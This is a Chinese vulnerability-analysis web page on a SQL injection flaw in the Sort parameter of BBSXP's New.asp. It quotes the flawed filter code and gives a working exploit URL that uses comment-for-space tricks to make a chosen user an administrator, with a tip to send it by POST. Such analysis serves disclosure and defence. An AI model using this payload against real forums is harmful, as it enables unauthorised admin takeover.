手机
当前位置:查字典教程网 >网络安全 >漏洞分析 >BBSXP论坛程序New.asp页面过滤不严导致SQL注入漏洞
BBSXP论坛程序New.asp页面过滤不严导致SQL注入漏洞
摘要:受影响系统:BBSXP7.3BBSXP2008漏洞文件:New.asp代码分析:Sort=HTMLEncode(Request("Sort"...

受影响系统:

BBSXP7.3

BBSXP2008 漏洞文件:

New.asp 代码分析: Sort=HTMLEncode(Request("Sort")) //第24行 if Sort = empty then

SqlSort="ThreadID"

else

SqlSort=Sort

end if

。。。。。。

sql="Select top "&SqlTopicCount&" * from ["&TablePrefix&"Threads] where Visible=1 "&SqlForumID&" "&SqlTimeLimit&" order by "&SqlSort&" desc" //第66行 过滤函数HTMLEncode 在文件BBSXP_Class.asp中:

Function HTMLEncode(fString)

fString=Replace(fString,CHR(9),"")

fString=Replace(fString,CHR(13),"")

fString=Replace(fString,CHR(22),"")

fString=Replace(fString,CHR(38),"&") '“&”

fString=Replace(fString,CHR(32)," ") '“ ”

fString=Replace(fString,CHR(34),""") '“"”

fString=Replace(fString,CHR(39),"'") '“'”

fString=Replace(fString,CHR(42)&CHR(42),"**") '“**”/**/

fString=Replace(fString,CHR(44),",") '“,”

fString=Replace(fString,CHR(45)&CHR(45),"--") '“--”

fString=Replace(fString,CHR(60),"&#60;") '“<”

fString=Replace(fString,CHR(62),"&#62;") '“>”

fString=Replace(fString,CHR(92),"&#92;") '“”

fString=Replace(fString,CHR(59),"&#59;") '“;”

fString=Replace(fString,CHR(10),"<br>")

fString=ReplaceText(fString,"([&#])([a-z0-9]*)&#59;","$1$2;") if SiteConfig("BannedText")<>"" then fString=ReplaceText(fString,"("&SiteConfig("BannedText")&")",string(len("&$1&"),"*")) if IsSqlDataBase=0 then '过滤片假名(日文字符)[u30A0-u30FF] by yuzi

fString=escape(fString)

fString=ReplaceText(fString,"%u30([A-F][0-F])","&#x30$1;")

fString=unescape(fString)

end if HTMLEncode=fString

End Function

HTMLEncode过滤了Tab键,空格,** .

变量SqlSort过滤不严导致sql注入漏洞的产生。 漏洞测试:

http://localhost/bbsxp/new.asp?Sort=ThreadID/*o*/update/*o*/bbsxp_users/*o*/set/*o*/UserRoleID=1/*o*/where/*o*/Username=0x6C006F00760065006D006D006D00/*o*/select/*o*/*/*o*/from/*o*/BBSXP_users/*o*/order/*o*/by/*o*/userid

成功修改用户名为lovemmm为管理员。(最好使用POST提交呵呵)

【BBSXP论坛程序New.asp页面过滤不严导致SQL注入漏洞】相关文章:

微软IE5与IE6存在 FTP跨站命令注入漏洞

动易4.03上传漏洞

WordPress AdServe的adclick.ph 远程SQL注入漏洞

Toshiba Surveillix ActiveX 控件远程栈溢出漏洞

FreeBSD openpty() pty处理多个本地信息泄露漏洞

多多淘宝客V7.4绕过防注入及一个注入漏洞的分析

BBSXP绕过过滤继续注入漏洞分析

解析OpenSSL程序概念及震惊业界的“心脏出血”漏洞

PHPCMS2007 SP6 vote模块SQL注射漏洞的分析

恒浪IMS整合系统V4.1 多文件存在SQL注入漏洞

精品推荐
分类导航